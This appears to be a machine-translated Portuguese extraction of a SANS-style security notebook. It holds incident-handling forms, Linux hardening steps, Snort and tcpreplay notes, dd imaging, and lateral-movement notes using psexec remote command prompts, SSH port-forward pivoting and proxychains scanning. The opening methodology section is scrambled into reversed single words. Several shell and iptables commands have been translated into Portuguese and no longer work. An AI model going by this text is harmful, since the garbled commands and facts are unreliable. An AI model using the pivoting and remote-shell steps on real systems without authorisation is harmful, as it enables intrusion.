Consequências
ÿ

Objetivo:

E-
Documentar
específico.
segurança
problema
investigar
por
responsáveis
dedicado
referência
guia
um
é
Incidentes
a
Resposta
de
Metodologia
Esta
mail:
e-
endereço
no
possível
informações
de
máximo
o
Reúna
Resumo

futuro.
no
semelhantes
ataques
evitar
a
ajudar
pode
isso
incidente,
o
sobre
subsidiárias
e
hierarquia
sua
Informe
IRM?
planilhas
usar
deve
Quem
o
localizar
tente
e
mails
e-
dos
cabeçalhos
os
Analise • Administradores
fonte •CISOs
Computadores)
Emergências
a
Resposta
de
(Equipe
•CERTs
delegados
e •
Segurança
Operações
de
Centro
Internet
da
ferramentas
com
mail
e-
de
endereço
o
Pesquise

mail
e-
de
endereço
do
trás
por
usuário
o
Geolocalize
o

visualizar
para
social
engenharia
de
ataques
os
todos
ÿ
Se
se:

esquema.
o incidente.
no
envolvidos
os
todos
a
disponibilizado
e
escrito
ser
deve
incidente
de
relatório
Um
Lembre-

Relatório
4 descritos:
ser
devem
temas
seguintes
Os

ÿinicial

a
cronogramas
ÿe

Remediação

Tomar
indiretas)
e
diretas
(perdas
incidente
do
Custo
errado
certo
deu
que
ÿO segurança
de
incidentes
com
lidar
para
definidas
são
etapas
6

Objetivo:
Etapas

tentadas:
ser
podem
remediação
de
ações
possíveis
Algumas
o

queixa,
uma
registrar
ou
e/
polícia
a
ÿAlertar
Preparação: e
Identificação:

se
saber
para
confiança
de
círculos
em
o
ÿDiscuta
sozinha,
problema
esse
enfrenta
empresa
a
o Contenção:
o Remediação:

Ameaçar
ser
puder
ele
se
legais
ações
com
agressor
o conscientização.
especialmente
social,
engenharia
da
manuseio
de
experiência
a
melhorar
essas
capitalizar
para
definidos
ser
devem
processos
O
a Recuperação:

ÿ
identificado
Resultado:

ações

público
uso
de
é
documento
Este

99
113
Machine Translated by Google

Forneça
um Qualidades
de
um Fornece
a Inclui Descreve
figuras a e
Pareceestruturado
a
seções
em É para
adicionais
Dicas o a
Use
(criptografe)
Proteja Explique
a
e Esforce-
importância
se Mais
6
de
dicas 4
dicas de
Relatório são
Recomendações
ignoradas:
4
http://

Preencha
as Envolva
e
colegas a
Documente
usada
metodologia
Documentação
da tipo
o
Esclareça Se
e
aplicável, Se
aplicável, Descreva
os Consulte
estruturas
as
relevantes
que Liste Esclareça
Informe Discuta
quais Documente
e
todos e
conclusões
Documentando
a
Aoute a
Priorize
Mantenha
a

de etapas a suas o e
principais e
eliminar usando por

e
autoria
De
RELATÓRIO
DICAS a
apresenta
guia
Este 1.
Analisar
a e
2. 3. 4. e
5. o
6. e
7. a
8. o
Discuta 10. a
dados
dos
Análise regurgitando
dados Agrupar Identifique Ao
risco, tendências
a examinar
a 114
Machine Translated by Google

FORMULÁRIOS DE MANUSEIO DE INCIDENTES DE SEGURANÇA DE COMPUTADOR PÁGINA __ DE __

REGISTRO DE COMUNICAÇÃO DE INCIDENTES DATA DE ATUALIZAÇÃO:_____________

Data:______________ Hora:_________ • sou • Método pm (correio, telefone, e-mail, etc.):________________

Nome do iniciador:________________________________ Nome do destinatário:________________________________

Título do Iniciador: _________________________________ Título do destinatário: _________________________________

Organização Iniciadora: __________________________ Organização receptora:___________________________

Informações de contato do iniciador:___________________________ Informações de contato do destinatário: ___________________________

Detalhes:_______________________________________________________________________________________
Reservado.
_____________________________________________________________________________________________

_____________________________________________________________________________________________

_____________________________________________________________________________________________

Data:______________ Hora:_________ • sou • Método pm (correio, telefone, e-mail, etc.):________________

Nome do iniciador:________________________________ Nome do destinatário:________________________________

Título do Iniciador: _________________________________ Título do destinatário: _________________________________

Organização Iniciadora: __________________________ Organização receptora:___________________________

Informações de contato do iniciador:___________________________ Informações de contato do destinatário: ___________________________

Detalhes:_______________________________________________________________________________________

Impressão digital da chave = AF19 FA27 2F94 998D FDB5 DE3D F8B5 06E4 A169 4E46
_____________________________________________________________________________________________

_____________________________________________________________________________________________

_____________________________________________________________________________________________

Data:______________ Hora:_________ • sou • Método pm (correio, telefone, e-mail, etc.):________________

Nome do iniciador:________________________________ Nome do destinatário:________________________________

Direitos 2003, All Institute SANS

Título do Iniciador: _________________________________ Título do destinatário: _________________________________

©
Organização Iniciadora: __________________________ Organização receptora:___________________________

Informações de contato do destinatário:

Informações de contato do iniciador:___________________________ ___________________________

Detalhes:_______________________________________________________________________________________

_____________________________________________________________________________________________

_____________________________________________________________________________________________

_____________________________________________________________________________________________

© Instituto SANS 2003 Preparado por: Greg Jones Todos os direitos reservados
115 100
Machine Translated by Google

FORMULÁRIOS DE MANUSEIO DE INCIDENTES DE SEGURANÇA DE COMPUTADOR PÁGINA __ DE __

LISTA DE CONTATOS DE INCIDENTES DATA DE ATUALIZAÇÃO:_____________

Oficial de Segurança Corporativa: Equipe de Tratamento de Incidentes Corporativos, CIRT ou FIRST:

Nome:_______________________________________ Nome:_______________________________________

Título: ________________________________________ Título: ________________________________________

Telefone:______________ Telefone alternativo: ______________ Telefone:______________ Telefone alternativo: ______________

Móvel: ______________________ ... Móvel: ______________________ ...

Fax:_________________ Alt. Fax:_________________ Fax:_________________ Alt. Fax:_________________

Reservado.
E-mail: ______________________________________ E-mail: ______________________________________

Endereço: _____________________________________ Endereço: _____________________________________

_____________________________________________ _____________________________________________

Diretor de Assuntos Jurídicos Corporativos: CIO ou Gerente de Segurança de Sistemas de Informação:

Nome:_______________________________________ Nome:_______________________________________

Título: ________________________________________ Título: ________________________________________

Telefone:______________ Telefone alternativo: ______________ Telefone:______________ Telefone alternativo: ______________

Móvel: ______________________ ... Móvel: ______________________ ...

Impressão digital da chave = AF19 FA27 2F94 998D FDB5 DE3D F8B5 06E4 A169 4E46
Fax:_________________ Alt. Fax:_________________ Fax:_________________ Alt. Fax:_________________

E-mail: ______________________________________ E-mail: ______________________________________

Endereço: _____________________________________ Endereço: _____________________________________

_____________________________________________ _____________________________________________

Diretor de Relações Públicas Corporativas: Outro (especifique):__________________________

Nome:_______________________________________ Nome:_______________________________________
Direitos 2003, All Institute SANS
Título:
©
________________________________________

Telefone:______________ Telefone alternativo: ______________

Título: ________________________________________

Telefone:______________ Telefone alternativo: ______________

Móvel: ______________________ ... Móvel: ______________________ ...

Fax:_________________ Alt. Fax:_________________ Fax:_________________ Alt. Fax:_________________

E-mail: ______________________________________ E-mail: ______________________________________

Endereço: _____________________________________ Endereço: _____________________________________

_____________________________________________ _____________________________________________

© Instituto SANS 2003 Preparado por: Greg Jones Todos os direitos reservados
116 101
Machine Translated by Google

FORMULÁRIOS DE MANUSEIO DE INCIDENTES DE SEGURANÇA DE COMPUTADOR PÁGINA __ DE __

LISTA DE CONTATOS DE INCIDENTES DATA DE ATUALIZAÇÃO:_____________

Contatos locais

Contato técnico do provedor de serviços de Internet: FBI local ou agência equivalente:

Nome:_______________________________________ Nome:_______________________________________

Título: ________________________________________ Título: ________________________________________

Telefone:______________ Telefone alternativo: ______________ Telefone:______________ Telefone alternativo: ______________

Móvel: ______________________ ... Móvel: ______________________ ...

Reservado.
Fax:_________________ Alt. Fax:_________________ Fax:_________________ Alt. Fax:_________________

E-mail: ______________________________________ E-mail: ______________________________________

Endereço: _____________________________________ Endereço: _____________________________________

_____________________________________________ _____________________________________________

Crimes de informática da polícia local: Equipe local do CIRT ou FIRST:

Nome:_______________________________________ Nome:_______________________________________

Título: ________________________________________ Título: ________________________________________

Telefone:______________ Telefone alternativo: ______________ Telefone:______________ Telefone alternativo: ______________

Móvel: ______________________ ... Móvel: ______________________ ...

Impressão digital da chave = AF19 FA27 2F94 998D FDB5 DE3D F8B5 06E4 A169 4E46
Fax:_________________ Alt. Fax:_________________ Fax:_________________ Alt. Fax:_________________

E-mail: ______________________________________ E-mail: ______________________________________

Endereço: _____________________________________ Endereço: _____________________________________

_____________________________________________ _____________________________________________

Outro (especifique):__________________________ Outro (especifique):__________________________

Direitos 2003,
Nome:_______________________________________ All Institute SANS
Nome:_______________________________________

Título:
©
________________________________________ Título: ________________________________________

Telefone:______________ Telefone alternativo: ______________ Telefone:______________ Telefone alternativo: ______________

Móvel: ______________________ ... Móvel: ______________________ ...

Fax:_________________ Alt. Fax:_________________ Fax:_________________ Alt. Fax:_________________

E-mail: ______________________________________ E-mail: ______________________________________

Endereço: _____________________________________ Endereço: _____________________________________

_____________________________________________ _____________________________________________

© Instituto SANS 2003 Preparado por: Greg Jones

117
Todos os direitos reservados
102
Machine Translated by Google

FORMULÁRIOS DE MANUSEIO DE INCIDENTES DE SEGURANÇA DE COMPUTADOR PÁGINA __ DE __

IDENTIFICAÇÃO DE INCIDENTES DATA DE ATUALIZAÇÃO:_____________

Informações gerais
Informações do detector de incidentes:

Nome:_______________________________________ Data e hora detectada: ________________________________________

Título: ________________________________________

Telefone:______________ Telefone alternativo: ______________ Localização do incidente detectado em: __________________

Móvel: _______________________________ Pager:__________________ ______________________________________________

Fax:_________________ Fax alternativo:_________________ Informações adicionais:___________________________

Reservado.
E-mail: ______________________________________ _____________________________________________

Endereço: _____________________________________ _____________________________________________

_____________________________________________ _____________________________________________

Assinatura do detector:____________________________ Data da assinatura: __________________________________

Resumo do incidente

Tipo de incidente detectado:

• Negação de serviço
•
• Uso não autorizado • Sonda • Farsa
Espionagem
Impressão digital
• Código Malicioso
da chave = AF19 FA27 2F94
• Acesso não autorizado
998D FDB5 DE3D F8B5 06E4 A169 4E46
• Outro:____________________________________

Localização do incidente:

Site:_________________________________________ Como o incidente foi detectado:____________________

Ponto de contato do site:____________________________ _____________________________________________

Telefone:______________ Telefone alternativo: ______________ _____________________________________________

Móvel: ______________________ ... _____________________________________________

Direitos 2003, All Institute SANS

E-mail:
©
Fax:_________________ Alt. Fax:_________________

______________________________________
_____________________________________________

_____________________________________________

Endereço: _____________________________________ _____________________________________________

_____________________________________________ _____________________________________________

Informações adicionais: ______________________________________________________________________________

________________________________________________________________________________________________

________________________________________________________________________________________________

© Instituto SANS 2003 Preparado por: Greg Jones Todos os direitos reservados
118 103
Machine Translated by Google

FORMULÁRIOS DE MANUSEIO DE INCIDENTES DE SEGURANÇA DE COMPUTADOR PÁGINA __ DE __

CONTENÇÃO DE INCIDENTES DATA DE ATUALIZAÇÃO:_____________

Isole os sistemas afetados:

A equipe de decisão do comando aprovou a remoção da rede? • SIM • NÃO

Se SIM, os sistemas de data e hora foram removidos: ________________________________________________________

Se NÃO, indique o motivo: __________________________________________________________________________

_____________________________________________________________________________________________

_____________________________________________________________________________________________

Faça backup dos sistemas afetados:

Reservado.
• SIM • NÃO
O backup do sistema foi bem-sucedido para todos os sistemas?

Nome das pessoas que fizeram o backup:__________________________________________________________________

_____________________________________________________________________________________________

_____________________________________________________________________________________________

_____________________________________________________________________________________________

_____________________________________________________________________________________________

Data e hora em que os backups foram iniciados:____________________________________________________________________

Data e hora em que os backups foram concluídos: __________________________________________________________________

Impressão digital da chave = AF19 FA27 2F94 998D FDB5 DE3D F8B5 06E4 A169 4E46
Fitas de backup seladas? • SIM • NÃO Data do selo: ________________________________________

As fitas de backup foram entregues a:______________________________________________________________________

Assinatura:_______________________________________________________ Data: ________________________________________

Local de armazenamento de backup: __________________________________________________________________________

Direitos 2003, All Institute SANS

©

© Instituto SANS 2003 Preparado por: Greg Jones Todos os direitos reservados
119 104
Machine Translated by Google

FORMULÁRIOS DE MANUSEIO DE INCIDENTES DE SEGURANÇA DE COMPUTADOR PÁGINA __ DE __

ERRADICAÇÃO DE INCIDENTES DATA DE ATUALIZAÇÃO:_____________

Nome das pessoas que realizam a perícia forense nos sistemas: ________________________________________________

_____________________________________________________________________________________________

_____________________________________________________________________________________________

_____________________________________________________________________________________________

_____________________________________________________________________________________________

A vulnerabilidade foi identificada? • SIM • NÃO

Descrever: _____________________________________________________________________________________ Reservado.

_____________________________________________________________________________________________

_____________________________________________________________________________________________

_____________________________________________________________________________________________

_____________________________________________________________________________________________

_____________________________________________________________________________________________

Qual foi o procedimento de validação usado para garantir que o problema foi erradicado:
____________________________

_____________________________________________________________________________________________

_____________________________________________________________________________________________

Impressão digital da chave = AF19 FA27 2F94 998D FDB5 DE3D F8B5 06E4 A169 4E46
_____________________________________________________________________________________________

_____________________________________________________________________________________________

_____________________________________________________________________________________________

_____________________________________________________________________________________________

_____________________________________________________________________________________________

Direitos 2003, All Institute SANS

©

© Instituto SANS 2003 Preparado por: Greg Jones Todos os direitos reservados
120 105
Machine Translated by Google

FORMULÁRIOS DE MANUSEIO DE INCIDENTES DE SEGURANÇA DE COMPUTADOR PÁGINA __ DE __

PESQUISA DE INCIDENTES DATA DE ATUALIZAÇÃO:_____________

Localização(ões) dos sistemas afetados: _____________________________________________________________

_____________________________________________________________________________________________

_____________________________________________________________________________________________

_____________________________________________________________________________________________

Data e hora em que os responsáveis pelo incidente chegaram ao local:

________________________________________________

_____________________________________________________________________________________________

_____________________________________________________________________________________________ Reservado.
Descreva os sistemas de informação afetados (recomenda-se um formulário por sistema):

Fabricante de hardware:__________________________________________________________________________

Número de série: _________________________________________________________________________________

Número de propriedade corporativa (se aplicável): ___________________________________________________________

O sistema afetado está conectado a uma rede? • SIM • NÃO

Nome do sistema: _________________________________________________________________________________

Endereço de rede do sistema:_________________________________________________________________________

Endereço MAC: _________________________________________________________________________________

Impressão digital da chave = AF19 FA27 2F94 998D FDB5 DE3D F8B5 06E4 A169 4E46
O sistema afetado está conectado a um modem? • SIM • NÃO

Número de telefone: __________________________________________________________________________________

Descreva a segurança física do local dos sistemas de informação afetados (fechaduras, alarmes de segurança,
acesso ao edifício, etc.):
_______________________________________________________________________________________________

_______________________________________________________________________________________________

_______________________________________________________________________________________________

Direitos 2003, All Institute SANS

©
_______________________________________________________________________________________________

_______________________________________________________________________________________________

_______________________________________________________________________________________________

_______________________________________________________________________________________________

_______________________________________________________________________________________________

_______________________________________________________________________________________________

© Instituto SANS 2003 Preparado por: Greg Jones

121
Todos os direitos reservados
106
Machine Translated by Google

Notas:

Estas são apenas notas diversas que uso com frequência.

Pesquisando em vários pcaps ao mesmo tempo:

• para i em *; faça ngrep -W byline -O /diretório/saída/desejada/tráfego$i.pcap -qI $i host 192.168.1.1;

feito

• cd /desired/output/directory • mergecap

-w desiredname.pcap tráfego*.pcap

Agora você tem um único pcap com apenas o tráfego desejado com base nos filtros bpf que você deu o primeiro
comando.

Prompt de comando remoto psexec do Windows:

Primeiro baixe o Sysinternals da Microsoft e, em um prompt de comando, navegue até a pasta

• psexec.exe \\targetIP -u nome de usuário -p senha cmd.exe

isso pode funcionar sem as opções de nome de usuário e senha se o seu computador fizer parte do domínio

122
107
Machine Translated by Google

Notas:

123 108
Machine Translated by Google

Notas:

124
109
Machine Translated by Google

Notas:

125 110
Machine Translated by Google

Notas:

126 111
Machine Translated by Google

Notas:

127
112
Machine Translated by Google

Notas:

128 113
Machine Translated by Google

Notas:

129 114
Machine Translated by Google

Etapas de reforço do Fedora Linux:

1. Deseja verificar as coisas como nível de execução 3. Queremos desativar o excesso
a. chkconfig –list | grep '3:on
b. Desligue os serviços com: chkconfig serviceName off
2. (provavelmente não no GSE) mas para verificar os pacotes faça: yum list
a. Para remover: yum -y remove package-name
3. execute: netstat -tulpn para ver quais portas estão abertas e os programas associados. Aqui estão os Serviços de Amostra do Fedora
[root@localhost ~]# netstat -tulpn
Conexões de Internet ativas (somente servidores) (NO LAB I NMAP E SEM PORTAS ABERTAS)
Proto Recv-Q Send-Q Endereço local 0 0 Endereço estrangeiro PID do estado/nome do programa
0.0.0.0:111 0.0.0.0:* tcp 0 0 0.0.0.0:22 OUÇA 483/rpcbind
0.0.0.0:* tcp 0 0 127.0.0.1:631 0.0.0.0:* tcp 0 0 OUÇA 758/sshd
0.0.0.0:41116 0.0.0.0:* tcp tcp6 0 0 :::111 :::* tcp6 0 0 :::22 OUÇA 1164/cupsd
tcp6
udp 0 0 :::1:631 tcp6 0 0 :::56797 udp 0 0 0.0.0.0:5353 OUÇA 806/rpc.statd
0 0 0.0.0.0:43287 udp 0 0 127.0.0.1:323 udp OUÇA 483/rpcbind
0 0 0.0.0.0:622 udp 0 0 :::* OUÇA 758/sshd
0.0.0.0:50086 udp 0 0 OUÇA 1164/cupsd
127.0.0.1:982 udp 0 0 OUÇA 806/rpc.statd
0.0.0.0:68 udp 0 0 0.0.0.0:10331 :::* :::* 444/avahi-daemon: r
udp 0 0 0.0.0.0:111 udp 0 0 0.0.0.0:123 0.0.0.0:* 806/rpc.status
udp6 0 0 ::1:323 udp6 0 0 :::19785 0.0.0.0:* 0.0.0.0:* 475/crônica
udp6 0 0 :::53756 udp6 0 0 :::622 0.0.0.0:* 483/rpcligação
udp6 0 0 :::111 udp6 0 0 :::123 4. O 0.0.0.0:* 444/avahi-daemon: r
arquivo /etc/sudoers pode ser editado 0.0.0.0:* 806/rpc.status
usando visudo 0.0.0.0:* 1345/dhclient
0.0.0.0:* 1345/dhclient
0.0.0.0:* 483/rpcligação
475/crônica
475/crônica
1345/dhclient
806/rpc.status
483/rpcligação
483/rpcligação
0.0.0.0:* :::* :::* :::* :::* :::* :::*475/crônica

Você pode adicionar um usuário ao grupo sudoers para dar privilégio total ou:
a. jadmin ALL=/sbin/halt, /bin/kill, /etc/init.d/httpd (isso permitirá certos comandos)
5. SSH - /etc/ssh/sshd_config
a. PermitRootLogin não
b. AllowUsers nome de usuário nome de usuário nome de usuário nome de usuário (permitir/negar pode ser usuário indistintamente)
c. DenyGroups grupo1 grupo2 (permitir/negar podem ser usados de forma intercambiável)
d. Usando o protocolo v2: Protocolo 2
e. ClientAliveInterval 300 (segundos, define o intervalo de tempo limite do log ocioso)
f.ClientAliveCountMax 0
g. IgnoreRhosts sim (desabilita o arquivo .rhosts )
h. PermitEmptyPasswords não

6. permitir ou proibir usuários usando cron /etc/cron.deny ou /etc/cron/deny

a. para proibir TODOS os usuários: echo ALL >> /etc/cron.deny
7. Habilitar ou desabilitar o Selinux /etc/selinux/config
a. Você pode visualizar o status atual do modo SELinux na linha de comando usando 'system-config-selinux',
Comandos 'getenforce' ou 'sestatus' .
Machine Translated by Google

b. #sestatus
c. #setenforce impondo (habilita)
8. Senhas /etc/security/opasswd contém todas as senhas antigas. a. nano /
etc/pam.d/system-auth b. adicione a
seguinte linha para impedir o uso das últimas 5 senhas de senha.
pam.unix.so nullock use_authtok md5 shadow lembrar=5
c. para visualizar informações de envelhecimento de usuários existentes, como data e hora de expiração, use:
chage -l username d. para alterar: chage -M 60
username chage -M -m 7 -W 7 username (-M define o máximo de dias, -m define o mínimo de dias, -W define os dias para avisar)
c. Para bloquear ou desbloquear uma conta passwd -l accountName ou passwd -u accountName d.
Aplicando senhas fortes /etc/pam.dsystem-auth /lib/security/
$ISA/pam_cracklib.so retry=3 minlen=8 lcredit=-1 ucredit=-2 dcredit=-2 ocredit=-1
maiúscula = lcredit, ucredit = minúscula, dígito é dcredit = -2, ocredit = -1 ou outro caractere
e. verificar contas para senhas vazias cat /etc/passwd | awk -F '($2==””){print $1}'
SE a senha estiver em /etc/shadow haverá um 'x', mas se estiver vazio não haverá nada nesse campo
f. /etc/shadow {userName}:{password}:{lastpasswdchanged}:{Minimum_days}:{Maximum_days}: {Warn}:{Inactive}:{Expire}:
9. Logs importantes /var/log/
message – Onde os
logs de todo o sistema ou os logs de atividade atuais estão disponíveis. /var/log/auth.log – Logs de
autenticação. /var/log/kern.log – Logs do
kernel. /var/log/cron.log – Logs do
Crond (tarefa cron). /var/log/maillog – Logs do
servidor de e-mail. /var/log/boot.log – Log
de inicialização do sistema. /var/log/
mysqld.log – Arquivo de log do servidor de banco de dados
MySQL. /var/log/secure – Log de
autenticação. /var/log/utmp ou /var/log/wtmp: Arquivo de
registros de login. /var/log/yum.log: Arquivos de log do Yum.
10. Mantenha /boot como somente leitura e não como execução de leitura.
Nano /etc/fstab a. deve ser LABEL=/boot /boot ext4 defaults,ro 12
11. É importante manter-se atualizado usando yum update 12.
Certifique-se de que contas não root tenham UID definido como 0: awk -F: '($3 == “0”) {print}' /etc/passwd Deve
ver apenas: root:x:0:0:root:/root:/bin/bash 13. Desabilite
binários SUID e GSGID indesejados: find / -iperm +4000 e find / -perm +2000
SUID/SGID sudo find / -xdev -type f -perm +ug=s 14.
Arquivos graváveis pelo mundo: find /dir -xdev -type d \( -perm -0002 -a ! -perm -1000 \) -print sudo find /
-path /proc -prune -o \ -perm +o=w ! \
( -type d -perm +o=t \) ! -type l
15. Nenhum arquivo proprietário: find /dir -xdev \( -nouser -o -nogroup \) -print\ find /
o -perm +6000 -type f -exec ls -ld {} \; 15.5 16. Configure
host Linux ou Unix para registrar mensagens em um loghost centralizado Você precisa abrir o
arquivo de configuração do syslog /etc/syslog.conf: # vi /etc/syslog.conf
Configure o syslogd para
enviar todas as mensagens importantes relacionadas à autenticação para o IP do loghost 192.168.1.100 (ou use o FQDN se
configurado)
*.*;auth,authpriv.none OU @192.168.1.100

*.*;auth,authpriv.none @loghost.meudominio.com.
Reinicie o sysklogd (Debian Linux):
Machine Translated by Google

# /etc/init.d/sysklogd reiniciar
OU
Reinicie o syslogd no Red Hat/Fedora / CentOS Linux
# serviço syslog reiniciar
Se necessário, abra a porta UDP 514 de saída de outros hosts:
iptables -A SAÍDA -p udp -s 192.168.1.100 --sport 1024:65535 -d 192.168.1.5 --dport 514 -m state --state NOVO,ESTABELECIDO -j ACEITAR

iptables -A INPUT -p udp -s 192.168.1.5 --sport 514 -d 192.168.1.100 --dport 1024:65535 -m state --state ESTABELECIDO -j ACEITAR

sudo iptables-save > /etc/iptables_rules

Não importa realmente onde você coloca o arquivo, tudo o que você precisa fazer é certificar-se de que a próxima linha se
refere ao mesmo arquivo. Em seguida, abra /etc/rc.local e adicione esta linha:
/sbin/iptables-restore < /etc/iptables_rules

17. O arquivo de configuração padrão é /etc/logrotate.conf

18. Banners de conexão. Localizados em /etc/motd para ssh. Todos os outros em /etc/banners. Precisa ser configurado primeiro em /etc/
hosts.allow adicionando a seguinte linha: vsftpd : ALL : banners /etc/banners. Também pode restringir com base no seguinte portmap : 1.2.3.4 :
deny
19. TODOS: 206.182.68.0: gerar /bin/ 'data' %c %d >> /var/log/intruder_alert
O token %d fornece o nome do serviço que o invasor estava tentando acessar.
Para permitir a conexão e registrá-la, coloque a diretiva spawn acima no arquivo /etc/hosts.allow.
20. NIS
a. Um servidor NIS é composto de vários aplicativos. Eles incluem o seguinte:
• /usr/sbin/rpc.yppasswdd — Também chamado de serviço yppasswdd , este daemon permite que os usuários alterem seus
Senhas do NIS.
• /usr/sbin/rpc.ypxfrd — Também chamado de serviço ypxfrd , este daemon é responsável pelas transferências de mapas NIS
pela rede.
• /usr/sbin/yppush — Este aplicativo propaga bancos de dados NIS alterados para vários servidores NIS.
• /usr/sbin/ypserv — Este é o daemon do servidor NIS.

21. NIS – Normalmente porta 834, 835

Se o arquivo /var/yp/securenets estiver em branco ou não existir (como é o caso após uma instalação padrão), o NIS escuta todas as
redes. Uma das primeiras coisas a fazer é colocar pares de máscara de rede/rede no arquivo para que o ypserv responda apenas a
solicitações da rede apropriada.
Abaixo está um exemplo de entrada de um arquivo /var/yp/securenets:
255.255.255.0 192.168.0.0
22. Configuração do Firewall NFS
As portas usadas para NFS são atribuídas dinamicamente pelo rpcbind, o que pode causar problemas quando
criando regras de firewall. Para simplificar neste processo, use o arquivo /etc/sysconfig/nfs para especificar quais portas
devem ser usados:
• MOUNTD_PORT — Porta TCP e UDP para mountd (rpc.mountd)
• STATD_PORT — Porta TCP e UDP para status (rpc.statd)
• LOCKD_TCPPORT — Porta TCP para nlockmgr (rpc.lockd)
• LOCKD_UDPPORT — porta UDP nlockmgr (rpc.lockd)

Os números de porta especificados não devem ser usados por nenhum outro serviço. Configure seu firewall para permitir os números de porta especificados, como
bem como TCP e UDP porta 2049 (NFS).
Execute o comando rpcinfo -p no servidor NFS para ver quais portas e programas RPC estão sendo usados.

23. Protegendo o servidor HTTP Apache

Sempre verifique se todos os scripts em execução no sistema funcionam conforme o esperado antes de colocá-los em produção.
Além disso, certifique-se de que somente o usuário root tenha permissões de gravação em qualquer diretório que contenha scripts ou CGIs. Para fazer isso
Machine Translated by Google

isso, execute os seguintes comandos como usuário root:

1. chown root <nome_do_diretório>
2. chmod 755 <nome_do_diretório>
Os administradores de sistema devem ter cuidado ao usar as seguintes opções de configuração (configuradas em /etc/httpd/conf/
httpd.conf):
24. Protegendo FTP
a. Para alterar o banner de saudação do vsftpd, adicione a seguinte diretiva ao arquivo /etc/vsftpd/vsftpd.conf:
ftpd_banner=<inserir_saudação_aqui>
b. /var/ftp/ se este arquivo existir, então existe acesso anônimo
c. anon_upload_enable=NO (em /etc/vsftpd/vsftpd.conf
d. local_enable=NO (isso desabilitará contas locais de usar FTP)
e. Para desabilitar contas de usuários específicas no vsftpd, adicione o nome de usuário em /etc/vsftpd.ftpusers
25. Limitando um invasor DOS
Ao definir limites para as seguintes diretivas em /etc/mail/sendmail.mc, a eficácia de tais ataques é limitada.

confCONNECTION_RATE_THROTTLE — O número de conexões que o servidor pode receber por

segundo. Por padrão, o Sendmail não limita o número de conexões. Se um limite for definido e atingido, conexões futuras serão
atrasadas.
confMAX_DAEMON_CHILDREN — O número máximo de processos filhos que podem ser gerados pelo servidor. Por padrão, o Sendmail
não atribui um limite ao número de processos filhos. Se um limite for definido e atingido, conexões posteriores serão atrasadas.

confMIN_FREE_BLOCKS — O número mínimo de blocos livres que devem estar disponíveis para o
servidor para aceitar e-mail. O padrão é 100 blocos.
confMAX_HEADERS_LENGTH — O tamanho máximo aceitável (em bytes) para um cabeçalho de mensagem.
confMAX_MESSAGE_SIZE — O tamanho máximo aceitável (em bytes) para uma única mensagem.
26. Contas somente de serviço ou restrição de acesso ao console
Contas de shell no servidor não devem ser permitidas e todos os shells de usuário no arquivo /etc/passwd para /sbin/nologin (com a
deve ser definido possível exceção do usuário root).
27. TEMPO
Na área de trabalho, vá para Aplicativos (o menu principal no painel) > Configurações do sistema > Data e
Tempo
•
Na área de trabalho, clique com o botão direito do mouse na hora na barra de ferramentas e selecione Ajustar data e hora.

28. PNT
O daemon do Network Time Protocol (NTP) sincroniza o relógio do sistema com um servidor de tempo remoto ou fonte de tempo. O aplicativo
permite que você configure um daemon NTP para sincronizar o relógio do sistema com um servidor remoto. Para habilitar esse recurso,
selecione Habilitar Network Time Protocol. Isso habilita a lista de Servidores NTP e outras opções. Você pode escolher um dos servidores
predefinidos, editar um servidor predefinido clicando em Editar ou adicionar um novo nome de servidor clicando em Adicionar. Seu sistema
não inicia a sincronização com o servidor NTP até que você clique em OK. Após clicar em OK, a configuração é salva e o daemon
NTP é iniciado (ou reiniciado se já estiver em execução).

Clicar no botão OK aplica quaisquer alterações feitas na data e hora, nas configurações do daemon NTP e nas configurações de fuso
horário. Ele também sai do programa.
29.

Notas do Snort
1. modifique o snort.conf.
2. alterar variáveis (veja o passo 3 para exemplos)
3. alterar regras específicas do site. Deveria ter incluído $RULE_PATH/local.rules
incluir $RULE_PATH/downloaded.rules
Machine Translated by Google

# Configure os endereços de rede que você está protegendo (EXEMPLOS de

variáveis) ipvar HOME_NET [192.168.0.0/16]
# Configure os endereços de rede externos. Deixe como "any" na maioria das
situações ipvar EXTERNAL_NET [!$HOME_NET]

4. para testar o pcap: sudo snort -r ~/Desktop/test.pcap -c /etc/snort/snort.conf -l ~/Desktop -r lê o pcap, -c

seleciona o arquivo conf, -l despeja localmente Deve ter um arquivo
'alert' e um arquivo pcap snort.log.{randomNum} no diretório de dump escolhido a. alert udp any any -> 192.168.10.2 7983
(msg:"Consecutive Pi"; pcre:"/pi/is"; threshold:type limit, seconds
faixa por_src, contagem 2 , 60; lado:333; rev:1;)

TcpReplay/tcprerwrite/tcpprep
Etapa 1 ¶
Use tcpprep para dividir o tráfego com base na porta de origem/destino: $
tcpprep --port --cachefile=example.cache --pcap=example.pcap Neste caso,
todos os pacotes direcionados para uma porta TCP ou UDP < 1024 são considerados cliente->servidor, enquanto outros pacotes são servidor->cliente. Essas informações são
armazenadas em um arquivo de cache tcpprep chamadoexample.cache para uso posterior.
Observação: o tcpprep suporta muitos outros métodos de divisão de tráfego além do modo de porta.
Etapa
2 Use tcprewrite para alterar os endereços IP para a rede local: $ tcprewrite
--endpoints=172.16.0.1:172.16.5.35 --cachefile=example.cache --infile=example.pcap --outfile=new.pcap Aqui, queremos que todo o tráfego
pareça estar entre dois hosts: 172.16.0.1 e 172.16.5.35. Queremos que um IP seja o "cliente" e o outro IP o "servidor", então usamos o arquivo de cache criado na última etapa.

Etapa
3 Use tcpreplay para enviar o tráfego através do IPS: #
tcpreplay --intf1=eth0 --intf2=eth1 --cachefile=example.cache new.pcap

Montagem com DD
0.1 Faça cópias originais e funcionais primeiro 1. Para
criar uma imagem #dd if=/dev/sda of=/mnt/nfs/backup/harddrive.img 2. Para verificar o sistema
de arquivos #file harddrive.dd 3. Para montar# mount -o ro ./
harddriveimage.dd /mnt 4. Para desmontar #umount /mnt 5. Para
restaurar #dd if=/mnt/mybackup.ddimg
of=/dev/sda

Alterando nomes em vários arquivos

1. contador=0
2. para i em ./webstats.php*; faça mv $i ./webstats$counter.html; contador=$((contador+1)); feito 3. python3 -m http.server
80

SCP
scp /caminho/para/arquivo usuá[email protected]:/caminho/para/destino

scp usuá[email protected]:/caminho/para/arquivo /caminho/para/destino

PIVOTAMENTO SSH ssh -L

127.0.0.1:445:10.10.9.159:445 [email protected] ----ip/porta local------ip/porta de

destino ---- --pivot usuário e IP de destino---- ssh socks proxy/
proxychains: SOCKS Proxy

Configure um proxy SOCKS em 127.0.0.1:1080 que permita que você faça pivot pelo host remoto (10.0.0.1): Linha de comando:
primeiro configure
proxychains em /etc/proxychains.conf. Por padrão, é a porta 9050 #ssh -D 127.0.0.1:9050
[email protected] target ip #proxychains nmap -n
9050
10.0.0.1
